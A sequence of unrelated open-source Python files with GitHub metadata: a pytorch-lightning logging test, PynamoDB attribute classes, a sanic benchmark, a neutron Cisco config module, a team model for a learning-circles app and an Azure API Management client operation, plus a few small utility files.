model.test_epoch_end = None
cb = TestCallback()
trainer = Trainer(
default_root_dir=tmpdir, limit_test_batches=2, num_sanity_val_steps=0, max_epochs=2, callbacks=[cb]
)
trainer.test(model)
assert cb.funcs_called_count["on_test_start"] == 1
assert cb.funcs_called_count["on_test_epoch_start"] == 1
assert cb.funcs_called_count["on_test_batch_end"] == 4
assert cb.funcs_called_count["on_test_epoch_end"] == 1
callback_metrics_keys = list(trainer.callback_metrics)
for func_name in cb.callback_funcs_called.keys():
is_in = False
for callback_metrics_key in callback_metrics_keys:
if func_name in callback_metrics_key:
is_in = True
assert is_in, (func_name, callback_metrics_keys)
def get_expected(on_epoch, values):
reduction = np.mean if on_epoch else np.max
return reduction(values)
# Make sure the func_name output equals the average from all logged values when on_epoch true
for dl_idx in range(num_dataloaders):
key = f"test_loss/dataloader_idx_{dl_idx}"
assert key in trainer.callback_metrics
assert torch.stack(model.seen_losses[dl_idx]).mean() == trainer.callback_metrics.pop(key)
for func_name, output_value in trainer.callback_metrics.items():
output_value = output_value.item()
func_attr = cb.funcs_attr[func_name]
original_values = cb.callback_funcs_called[func_attr["func_name"]]
expected_output = get_expected(func_attr["on_epoch"], original_values)
assert output_value == expected_output
for fx, attrs in cb.funcs_attr.items():
should_include = attrs["prog_bar"] and attrs["on_step"] ^ attrs["on_epoch"]
is_included = fx in trainer.progress_bar_metrics
assert is_included if should_include else not is_included
@mock.patch("pytorch_lightning.loggers.TensorBoardLogger.log_metrics")
def test_validation_step_log_with_tensorboard(mock_log_metrics, tmpdir):
"""
This tests make sure we properly log_metrics to loggers
"""
class ExtendedModel(BoringModel):
val_losses = []
def training_step(self, batch, batch_idx):
output = self.layer(batch)
loss = self.loss(batch, output)
self.log("train_loss", loss)
return {"loss": loss}
def validation_step(self, batch, batch_idx):
output = self.layer(batch)
loss = self.loss(batch, output)
self.val_losses.append(loss)
self.log("valid_loss_0", loss, on_step=True, on_epoch=True)
self.log("valid_loss_1", loss, on_step=False, on_epoch=True)
self.log("valid_loss_2", loss, on_step=True, on_epoch=False)
self.log("valid_loss_3", loss, on_step=False, on_epoch=False)
return {"val_loss": loss} # not added to callback_metrics
def test_step(self, batch, batch_idx):
output = self.layer(batch)
loss = self.loss(batch, output)
self.log("test_loss", loss)
return {"y": loss}
model = ExtendedModel()
model.validation_epoch_end = None
# Initialize a trainer
trainer = Trainer(
default_root_dir=tmpdir,
logger=TensorBoardLogger(tmpdir),
limit_train_batches=2,
limit_val_batches=2,
limit_test_batches=2,
max_epochs=2,
progress_bar_refresh_rate=1,
)
# Train the model ⚡
trainer.fit(model)
# hp_metric + 2 steps + epoch + 2 steps + epoch
expected_num_calls = 1 + 2 + 1 + 2 + 1
assert len(mock_log_metrics.mock_calls) == expected_num_calls
assert mock_log_metrics.mock_calls[0] == call({"hp_metric": -1}, 0)
def get_metrics_at_idx(idx):
mock_calls = list(mock_log_metrics.mock_calls)
if isinstance(mock_calls[idx].kwargs, dict):
return mock_calls[idx].kwargs["metrics"]
return mock_calls[idx][2]["metrics"]
expected = {"valid_loss_0_step", "valid_loss_2"}
assert set(get_metrics_at_idx(1)) == expected
assert set(get_metrics_at_idx(2)) == expected
assert get_metrics_at_idx(1)["valid_loss_0_step"] == model.val_losses[2]
assert get_metrics_at_idx(2)["valid_loss_0_step"] == model.val_losses[3]
assert set(get_metrics_at_idx(3)) == {"valid_loss_0_epoch", "valid_loss_1", "epoch"}
assert get_metrics_at_idx(3)["valid_loss_1"] == torch.stack(model.val_losses[2:4]).mean()
expected = {"valid_loss_0_step", "valid_loss_2"}
assert set(get_metrics_at_idx(4)) == expected
assert set(get_metrics_at_idx(5)) == expected
assert get_metrics_at_idx(4)["valid_loss_0_step"] == model.val_losses[4]
assert get_metrics_at_idx(5)["valid_loss_0_step"] == model.val_losses[5]
assert set(get_metrics_at_idx(6)) == {"valid_loss_0_epoch", "valid_loss_1", "epoch"}
assert get_metrics_at_idx(6)["valid_loss_1"] == torch.stack(model.val_losses[4:]).mean()
results = trainer.test(model)
assert set(trainer.callback_metrics) == {
"train_loss",
"valid_loss_0_epoch",
"valid_loss_0",
"valid_loss_1",
"test_loss",
}
assert set(results[0]) == {"test_loss"}
def test_logging_dict_on_validation_step(tmpdir):
class TestModel(BoringModel):
def validation_step(self, batch, batch_idx):
loss = super().validation_step(batch, batch_idx)
loss = loss["x"]
metrics = {
"loss": loss,
"loss_1": loss,
}
self.log("val_metrics", metrics)
validation_epoch_end = None
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=2,
progress_bar_refresh_rate=1,
)
trainer.fit(model)
|
{
"content_hash": "e5379a7796d33cef10b883c791117efa",
"timestamp": "",
"source": "github",
"line_count": 605,
"max_line_length": 120,
"avg_line_length": 35.30413223140496,
"alnum_prop": 0.5890725221218222,
"repo_name": "williamFalcon/pytorch-lightning",
"id": "8579bc044734a7807994f94fdf820a8aa36cb5f2",
"size": "21947",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/trainer/logging_/test_eval_loop_logging.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "511511"
},
{
"name": "Shell",
"bytes": "1731"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from frappe.desk.page.setup_wizard.install_fixtures import setup_email_linking
def execute():
setup_email_linking()
|
{
"content_hash": "9f90c001b9f23b69a5532406c9d6bec6",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 78,
"avg_line_length": 26.333333333333332,
"alnum_prop": 0.7911392405063291,
"repo_name": "adityahase/frappe",
"id": "08f57ca5e4a987afec6108b913358b289270ef62",
"size": "158",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "frappe/patches/v12_0/setup_email_linking.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "288806"
},
{
"name": "HTML",
"bytes": "209164"
},
{
"name": "JavaScript",
"bytes": "2350450"
},
{
"name": "Less",
"bytes": "160693"
},
{
"name": "Makefile",
"bytes": "99"
},
{
"name": "Python",
"bytes": "3035663"
},
{
"name": "SCSS",
"bytes": "45340"
},
{
"name": "Shell",
"bytes": "517"
},
{
"name": "Vue",
"bytes": "73943"
}
],
"symlink_target": ""
}
|
"""
PynamoDB attributes
"""
import six
import json
from base64 import b64encode, b64decode
from delorean import Delorean, parse
from pynamodb.constants import (
STRING, NUMBER, BINARY, UTC, DATETIME_FORMAT, BINARY_SET, STRING_SET, NUMBER_SET,
DEFAULT_ENCODING
)
class Attribute(object):
"""
An attribute of a model
"""
attr_name = None
def __init__(self,
attr_type=str,
hash_key=False,
range_key=False,
null=False,
default=None,
attr_name=None
):
self.value = None
self.default = default
self.null = null
self.attr_type = attr_type
self.is_hash_key = hash_key
self.is_range_key = range_key
if attr_name is not None:
self.attr_name = attr_name
def __set__(self, instance, value):
if isinstance(value, Attribute):
return self
if instance:
instance.attribute_values[self.attr_name] = value
self.value = value
def __get__(self, instance, owner):
if instance:
return instance.attribute_values.get(self.attr_name, None)
else:
return self
def serialize(self, value):
"""
This method should return a dynamodb compatible value
"""
return value
def deserialize(self, value):
"""
Performs any needed deserialization on the value
"""
return value
class SetMixin(object):
"""
Adds (de)serialization methods
"""
def serialize(self, value):
"""
Serializes a set
Because dynamodb doesn't store empty attributes,
empty sets return None
"""
if value and len(value):
return [val for val in sorted(value)]
else:
return None
def deserialize(self, value):
"""
Deserializes a set
"""
if value and len(value):
return set([val for val in value])
class BinaryAttribute(Attribute):
"""
A binary attribute
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', BINARY)
super(BinaryAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Returns a base64 encoded binary string
"""
return b64encode(value).decode(DEFAULT_ENCODING)
def deserialize(self, value):
"""
Returns a decoded string from base64
"""
return b64decode(value.encode(DEFAULT_ENCODING))
class BinarySetAttribute(SetMixin, Attribute):
"""
A binary set
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', BINARY_SET)
kwargs.setdefault('null', True)
super(BinarySetAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Returns a base64 encoded binary string
"""
if value and len(value):
return [b64encode(val).decode(DEFAULT_ENCODING) for val in sorted(value)]
else:
return None
def deserialize(self, value):
"""
Returns a decoded string from base64
"""
if value and len(value):
return set([b64decode(val.encode(DEFAULT_ENCODING)) for val in value])
class UnicodeSetAttribute(SetMixin, Attribute):
"""
A unicode set
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', STRING_SET)
kwargs.setdefault('null', True)
super(UnicodeSetAttribute, self).__init__(**kwargs)
class UnicodeAttribute(Attribute):
"""
A unicode attribute
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', STRING)
super(UnicodeAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Returns a unicode string
"""
if value is None or not len(value):
return None
elif isinstance(value, six.text_type):
return value
else:
return six.u(value)
class JSONAttribute(Attribute):
"""
A JSON Attribute
Encodes JSON to unicode internally
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', STRING)
super(JSONAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Serializes JSON to unicode
"""
if value is None:
return None
encoded = json.dumps(value)
return six.u(encoded)
def deserialize(self, value):
"""
Deserializes JSON
"""
return json.loads(value)
class BooleanAttribute(Attribute):
"""
A class for boolean attributes
This attribute type uses a number attribute to save space
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', NUMBER)
super(BooleanAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Encodes True as 1, False as 0
"""
if value is None:
return None
elif value:
return json.dumps(1)
else:
return json.dumps(0)
def deserialize(self, value):
"""
Encode
"""
return bool(json.loads(value))
class NumberSetAttribute(SetMixin, Attribute):
"""
A number set attribute
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', NUMBER_SET)
kwargs.setdefault('null', True)
super(NumberSetAttribute, self).__init__(**kwargs)
class NumberAttribute(Attribute):
"""
A number attribute
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', NUMBER)
super(NumberAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Encode numbers as JSON
"""
return json.dumps(value)
def deserialize(self, value):
"""
Decode numbers from JSON
"""
return json.loads(value)
class UTCDateTimeAttribute(Attribute):
"""
An attribute for storing a UTC Datetime
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', STRING)
super(UTCDateTimeAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Takes a datetime object and returns a string
"""
fmt = Delorean(value, timezone=UTC).datetime.strftime(DATETIME_FORMAT)
return six.u(fmt)
def deserialize(self, value):
"""
Takes a UTC datetime string and returns a datetime object
"""
return parse(value).datetime
|
{
"content_hash": "e9efd7b17e587e85973a23c315ad1f26",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 85,
"avg_line_length": 24.91417910447761,
"alnum_prop": 0.5650741350906096,
"repo_name": "mtsgrd/PynamoDB2",
"id": "7b31c41a8283b2f781a2a8a7ef510c6329ffbe34",
"size": "6677",
"binary": false,
"copies": "1",
"ref": "refs/heads/devel",
"path": "pynamodb/attributes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "265307"
}
],
"symlink_target": ""
}
|
from random import choice, seed
from pytest import mark
import sanic.router
from sanic.request import Request
seed("Pack my box with five dozen liquor jugs.")
# Disable Caching for testing purpose
sanic.router.ROUTER_CACHE_SIZE = 0
class TestSanicRouteResolution:
@mark.asyncio
async def test_resolve_route_no_arg_string_path(
self, sanic_router, route_generator, benchmark
):
simple_routes = route_generator.generate_random_direct_route(
max_route_depth=4
)
router, simple_routes = sanic_router(route_details=simple_routes)
route_to_call = choice(simple_routes)
request = Request(
"/{}".format(route_to_call[-1]).encode(),
{"host": "localhost"},
"v1",
route_to_call[0],
None,
None,
)
result = benchmark.pedantic(
router.get,
(
request.path,
request.method,
request.headers.get("host"),
),
iterations=1000,
rounds=1000,
)
assert await result[1](None) == 1
@mark.asyncio
async def test_resolve_route_with_typed_args(
self, sanic_router, route_generator, benchmark
):
typed_routes = route_generator.add_typed_parameters(
route_generator.generate_random_direct_route(max_route_depth=4),
max_route_depth=8,
)
router, typed_routes = sanic_router(route_details=typed_routes)
route_to_call = choice(typed_routes)
url = route_generator.generate_url_for_template(
template=route_to_call[-1]
)
print("{} -> {}".format(route_to_call[-1], url))
request = Request(
"/{}".format(url).encode(),
{"host": "localhost"},
"v1",
route_to_call[0],
None,
None,
)
result = benchmark.pedantic(
router.get,
(
request.path,
request.method,
request.headers.get("host"),
),
iterations=1000,
rounds=1000,
)
assert await result[1](None) == 1
|
{
"content_hash": "1eb7f4966abc7601c30187b20fdbd328",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 76,
"avg_line_length": 27.65432098765432,
"alnum_prop": 0.5334821428571429,
"repo_name": "ashleysommer/sanic",
"id": "a921d06306a1352d1a600a4088670f739d13960d",
"size": "2240",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/benchmark/test_route_resolution_benchmark.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "159"
},
{
"name": "Go",
"bytes": "482"
},
{
"name": "HTML",
"bytes": "1173"
},
{
"name": "Makefile",
"bytes": "2412"
},
{
"name": "Python",
"bytes": "962491"
}
],
"symlink_target": ""
}
|
import os
import time
import json
from pUtil import tolog, convert
def openFile(filename, mode):
""" Open and return a file pointer for the given mode """
# Note: caller needs to close the file
f = None
if os.path.exists(filename):
try:
f = open(filename, mode)
except IOError, e:
tolog("!!WARNING!!2997!! Caught exception: %s" % (e))
else:
tolog("!!WARNING!!2998!! File does not exist: %s" % (filename))
return f
def getJSONDictionary(filename):
""" Open json file and return its dictionary """
d = None
f = openFile(filename, 'r')
if f:
try:
d = json.load(f)
except Exception, e:
tolog("!!WARNING!!2222!! Failed to load json dictionary: %s" % (e))
else:
f.close()
# Try to convert the dictionary from unicode to utf-8
if d != {}:
try:
d = convert(d)
except Exception, e:
tolog("!!WARNING!!2996!! Failed to convert dictionary from unicode to utf-8: %s, %s" % (d, e))
else:
tolog("!!WARNING!!2995!! Load function returned empty JSON dictionary: %s" % (filename))
return d
def findLatestTRFLogFile(workdir):
""" Find out which is the latest log.* file """
last_log_file = ""
# Assume the log files begin with 'log.'
pattern = "log."
file_list = sortedLs(workdir, pattern)
if file_list != []:
last_log_file = os.path.join(workdir, file_list[-1])
tolog("Found payload log files: %s" % str(file_list))
tolog("File %s was the last log file that was updated" % (last_log_file))
else:
tolog("Did not find any log.* files")
return last_log_file
def sortedLs(path, pattern):
""" Sort the contents of directory 'path' using 'pattern' """
# Note: pattern is only a string, e.g. pattern = 'log.' will return a
# list with all files starting with 'log.' in time order
mtime = lambda f: os.stat(os.path.join(path, f)).st_mtime
file_list = []
try:
file_list = list(sorted(os.listdir(path), key=mtime))
except Exception, e:
tolog("!!WARNING!!3232!! Failed to obtain sorted file list: %s" % (e))
final_file_list = []
if file_list != []:
for f in file_list:
if f.startswith(pattern):
final_file_list.append(f)
return final_file_list
def readFile(filename):
""" Read the contents of a file """
contents = ""
if os.path.exists(filename):
try:
f = open(filename, 'r')
except IOError, e:
tolog("!!WARNING!!2121!! Failed to open file %s: %s" % (filename, e))
else:
try:
contents = f.read()
except Exception, e:
tolog("!!WARNING!!2122!! Failed to read file %s: %s" % (filename, e))
f.close()
else:
tolog("!!WARNING!!2121!! File does not exist: %s" % (filename))
return contents
def writeFile(filename, contents):
""" Write the contents to filename """
status = False
try:
f = open(filename, 'w')
except IOError, e:
tolog("!!WARNING!!2123!! Failed to open file %s: %s" % (filename, e))
else:
try:
f.write(contents)
except IOError, e:
tolog("!!WARNING!!2123!! Failed to write to file %s: %s" % (filename, e))
else:
status = True
f.close()
return status
def tail(f, lines=10):
""" Get the n last lines from file f """
if lines == 0:
return ""
BUFSIZ = 1024
f.seek(0, 2)
bytes = f.tell()
size = lines + 1
block = -1
data = []
while size > 0 and bytes > 0:
if bytes - BUFSIZ > 0:
# Seek back one whole BUFSIZ
f.seek(block * BUFSIZ, 2)
# read BUFFER
data.insert(0, f.read(BUFSIZ))
else:
# file too small, start from begining
f.seek(0,0)
# only read what was not read
data.insert(0, f.read(bytes))
linesFound = data[0].count('\n')
size -= linesFound
bytes -= BUFSIZ
block -= 1
tail_list = ''.join(data).splitlines()[-lines:]
return '\n'.join(tail_list)
# print findLatestTRFLogFile(os.getcwd())
|
{
"content_hash": "180207a51d24940f3b564107fed21859",
"timestamp": "",
"source": "github",
"line_count": 152,
"max_line_length": 114,
"avg_line_length": 28.75,
"alnum_prop": 0.5405034324942791,
"repo_name": "RRCKI/pilot",
"id": "221133a8d3f442666c8c8851324ccaf18082047c",
"size": "4430",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "FileHandling.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4096349"
},
{
"name": "Shell",
"bytes": "23530"
}
],
"symlink_target": ""
}
|
from oslo.config import cfg
from neutron.agent.common import config
cisco_opts = [
cfg.StrOpt('vlan_name_prefix', default='q-',
help=_("VLAN Name prefix")),
cfg.StrOpt('provider_vlan_name_prefix', default='p-',
help=_("VLAN Name prefix for provider vlans")),
cfg.BoolOpt('provider_vlan_auto_create', default=True,
help=_('Provider VLANs are automatically created as needed '
'on the Nexus switch')),
cfg.BoolOpt('provider_vlan_auto_trunk', default=True,
help=_('Provider VLANs are automatically trunked as needed '
'on the ports of the Nexus switch')),
cfg.BoolOpt('nexus_l3_enable', default=False,
help=_("Enable L3 support on the Nexus switches")),
cfg.BoolOpt('svi_round_robin', default=False,
help=_("Distribute SVI interfaces over all switches")),
cfg.StrOpt('model_class',
default='neutron.plugins.cisco.models.virt_phy_sw_v2.'
'VirtualPhysicalSwitchModelV2',
help=_("Model Class")),
]
cisco_n1k_opts = [
cfg.StrOpt('integration_bridge', default='br-int',
help=_("N1K Integration Bridge")),
cfg.BoolOpt('enable_tunneling', default=True,
help=_("N1K Enable Tunneling")),
cfg.StrOpt('tunnel_bridge', default='br-tun',
help=_("N1K Tunnel Bridge")),
cfg.StrOpt('local_ip', default='10.0.0.3',
help=_("N1K Local IP")),
cfg.StrOpt('tenant_network_type', default='local',
help=_("N1K Tenant Network Type")),
cfg.StrOpt('bridge_mappings', default='',
help=_("N1K Bridge Mappings")),
cfg.StrOpt('vxlan_id_ranges', default='5000:10000',
help=_("N1K VXLAN ID Ranges")),
cfg.StrOpt('network_vlan_ranges', default='vlan:1:4095',
help=_("N1K Network VLAN Ranges")),
cfg.StrOpt('default_network_profile', default='default_network_profile',
help=_("N1K default network profile")),
cfg.StrOpt('default_policy_profile', default='service_profile',
help=_("N1K default policy profile")),
cfg.StrOpt('network_node_policy_profile', default='dhcp_pp',
help=_("N1K policy profile for network node")),
cfg.IntOpt('poll_duration', default=60,
help=_("N1K Policy profile polling duration in seconds")),
cfg.BoolOpt('restrict_policy_profiles', default=False,
help=_("Restrict the visibility of policy profiles to the "
"tenants")),
cfg.IntOpt('http_pool_size', default=4,
help=_("Number of threads to use to make HTTP requests")),
cfg.IntOpt('http_timeout', default=15,
help=_("N1K http timeout duration in seconds")),
cfg.BoolOpt('restrict_network_profiles', default=False,
help=_("Restrict tenants from accessing network profiles "
"belonging to some other tenant")),
]
cfg.CONF.register_opts(cisco_opts, "CISCO")
cfg.CONF.register_opts(cisco_n1k_opts, "CISCO_N1K")
config.register_root_helper(cfg.CONF)
# shortcuts
CONF = cfg.CONF
CISCO = cfg.CONF.CISCO
CISCO_N1K = cfg.CONF.CISCO_N1K
#
# device_dictionary - Contains all external device configuration.
#
# When populated the device dictionary format is:
# {('<device ID>', '<device ipaddr>', '<keyword>'): '<value>', ...}
#
# Example:
# {('NEXUS_SWITCH', '1.1.1.1', 'username'): 'admin',
# ('NEXUS_SWITCH', '1.1.1.1', 'password'): 'mySecretPassword',
# ('NEXUS_SWITCH', '1.1.1.1', 'compute1'): '1/1', ...}
#
device_dictionary = {}
#
# first_device_ip - IP address of first switch discovered in config
#
# Used for SVI placement when round-robin placement is disabled
#
first_device_ip = None
class CiscoConfigOptions():
"""Cisco Configuration Options Class."""
def __init__(self):
self._create_device_dictionary()
def _create_device_dictionary(self):
"""
Create the device dictionary from the cisco_plugins.ini
device supported sections. Ex. NEXUS_SWITCH, N1KV.
"""
global first_device_ip
multi_parser = cfg.MultiConfigParser()
read_ok = multi_parser.read(CONF.config_file)
if len(read_ok) != len(CONF.config_file):
raise cfg.Error(_("Some config files were not parsed properly"))
first_device_ip = None
for parsed_file in multi_parser.parsed:
for parsed_item in parsed_file.keys():
dev_id, sep, dev_ip = parsed_item.partition(':')
if dev_id.lower() == 'n1kv':
for dev_key, value in parsed_file[parsed_item].items():
if dev_ip and not first_device_ip:
first_device_ip = dev_ip
device_dictionary[dev_id, dev_ip, dev_key] = value[0]
def get_device_dictionary():
return device_dictionary
|
{
"content_hash": "48e8059c9ade1f6e76f347d77be44332",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 77,
"avg_line_length": 39.08661417322835,
"alnum_prop": 0.6005237711522965,
"repo_name": "samsu/neutron",
"id": "ebc496bd1a3f9c9f9d2605caecac71760161b8a8",
"size": "5576",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "plugins/cisco/common/config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1043"
},
{
"name": "Python",
"bytes": "10579249"
},
{
"name": "Shell",
"bytes": "1535"
}
],
"symlink_target": ""
}
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from django.db import IntegrityError
from django.conf import settings
from django.urls import reverse
from django.utils.timezone import now
from django_bleach.models import BleachField
from .base import LifeTimeTrackingModel
import uuid
class Team(models.Model):
name = models.CharField(max_length=128)
subtitle = models.CharField(max_length=256, default=_('Join your neighbors to learn something together. Learning circles meet weekly for 6-8 weeks, and are free to join.'))
page_slug = models.SlugField(max_length=256, blank=True)
page_image = models.ImageField(blank=True)
logo = models.ImageField(blank=True)
latitude = models.DecimalField(max_digits=8, decimal_places=6, null=True, blank=True)
longitude = models.DecimalField(max_digits=9, decimal_places=6, null=True, blank=True)
zoom = models.IntegerField(default=7)
created_at = models.DateTimeField(default=now)
email_domain = models.CharField(max_length=128, blank=True)
invitation_token = models.UUIDField(null=True, blank=True, unique=True)
email_address = models.CharField(max_length=128, blank=True)
website = models.URLField(max_length=128, blank=True)
location = models.CharField(max_length=128, blank=True)
intro_text = BleachField(max_length=1000, blank=True, allowed_tags=settings.TINYMCE_DEFAULT_CONFIG.get('valid_elements', '').split(','), allowed_attributes={'a': ['href', 'title', 'rel', 'target']})
membership = models.BooleanField(default=False) # why not call this membership_active?
def __str__(self):
return self.name
def generate_invitation_token(self):
try:
self.invitation_token = uuid.uuid4()
self.save()
except IntegrityError:
generate_invitation_token(self)
def team_invitation_link(self):
if self.invitation_token is None:
return None
base_url = f'{settings.PROTOCOL}://{settings.DOMAIN}'
path = reverse('studygroups_facilitator_invitation_confirm_token', kwargs={'token': self.invitation_token})
return base_url + path
class TeamMembership(LifeTimeTrackingModel):
ORGANIZER = 'ORGANIZER'
MEMBER = 'MEMBER'
ROLES = (
(ORGANIZER, _('Organizer')),
(MEMBER, _('Member')),
)
team = models.ForeignKey('studygroups.Team', on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
role = models.CharField(max_length=256, choices=ROLES)
weekly_update_opt_in = models.BooleanField(default=True)
def __str__(self):
return 'Team membership: {}'.format(self.user.__str__())
def to_dict(self):
return {
'id': self.user.pk,
'email': self.user.email,
'firstName': self.user.first_name,
'lastName': self.user.last_name
}
class TeamInvitation(models.Model):
""" invittion for users to join a team """
team = models.ForeignKey('studygroups.Team', on_delete=models.CASCADE)
organizer = models.ForeignKey(User, on_delete=models.CASCADE) # organizer who invited the user
email = models.EmailField()
role = models.CharField(max_length=256, choices=TeamMembership.ROLES)
created_at = models.DateTimeField(auto_now_add=True)
responded_at = models.DateTimeField(null=True, blank=True)
joined = models.BooleanField(null=True)
def __str__(self):
return 'Invitation <{} to join {}>'.format(self.email, self.team.name)
def get_study_group_organizers(study_group):
""" Return the organizers for the study group """
team = study_group.team
if team:
organizers = team.teammembership_set.active().filter(role=TeamMembership.ORGANIZER).values('user')
return User.objects.filter(pk__in=organizers)
return []
def get_team_users(user):
""" Return the team members for a user """
# TODO this function doesn't make sense - only applies for logged in users
# change functionality or rename to get_team_mates
team_membership = TeamMembership.objects.active().filter(user=user)
if team_membership.count() == 1:
members = team_membership.first().team.teammembership_set.active().values('user')
return User.objects.filter(pk__in=members)
return []
""" Return the team a user belongs to """
def get_user_team(user):
team_membership = TeamMembership.objects.active().filter(user=user).get()
return team_membership.team
def eligible_team_by_email_domain(user):
# user is already on a team
if TeamMembership.objects.active().filter(user=user).exists():
return None
email_domain = user.email.rsplit('@', 1)[1]
matching_team = Team.objects.filter(email_domain=email_domain).first()
# user already has an explicit invitation to this team or has already responsed to an invitation to this team
if TeamInvitation.objects.filter(email=user.email, team=matching_team).exists():
return None
# team must have an organizer to create invitation
if not TeamMembership.objects.active().filter(team=matching_team, role=TeamMembership.ORGANIZER).exists():
return None
return matching_team
|
{
"content_hash": "688cd1aa4778272911d064ed2af9112f",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 202,
"avg_line_length": 38.970588235294116,
"alnum_prop": 0.6920754716981132,
"repo_name": "p2pu/learning-circles",
"id": "491b644dfbab482e724f0874e6cc8a817faa1529",
"size": "5300",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "studygroups/models/team.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "6537"
},
{
"name": "Dockerfile",
"bytes": "2110"
},
{
"name": "HTML",
"bytes": "222765"
},
{
"name": "JavaScript",
"bytes": "202138"
},
{
"name": "Python",
"bytes": "859945"
},
{
"name": "SCSS",
"bytes": "122949"
},
{
"name": "Shell",
"bytes": "808"
}
],
"symlink_target": ""
}
|
import sys
from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union, overload
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._quota_by_period_keys_operations import build_get_request, build_update_request
from .._vendor import ApiManagementClientMixinABC
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class QuotaByPeriodKeysOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.apimanagement.aio.ApiManagementClient`'s
:attr:`quota_by_period_keys` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def get(
self, resource_group_name: str, service_name: str, quota_counter_key: str, quota_period_key: str, **kwargs: Any
) -> _models.QuotaCounterContract:
"""Gets the value of the quota counter associated with the counter-key in the policy for the
specific period in service instance.
:param resource_group_name: The name of the resource group. Required.
:type resource_group_name: str
:param service_name: The name of the API Management service. Required.
:type service_name: str
:param quota_counter_key: Quota counter key identifier.This is the result of expression defined
in counter-key attribute of the quota-by-key policy.For Example, if you specify
counter-key="boo" in the policy, then it’s accessible by "boo" counter key. But if it’s defined
as counter-key="@("b"+"a")" then it will be accessible by "ba" key. Required.
:type quota_counter_key: str
:param quota_period_key: Quota period key identifier. Required.
:type quota_period_key: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: QuotaCounterContract or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.QuotaCounterContract
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
) # type: Literal["2021-08-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.QuotaCounterContract]
request = build_get_request(
resource_group_name=resource_group_name,
service_name=service_name,
quota_counter_key=quota_counter_key,
quota_period_key=quota_period_key,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
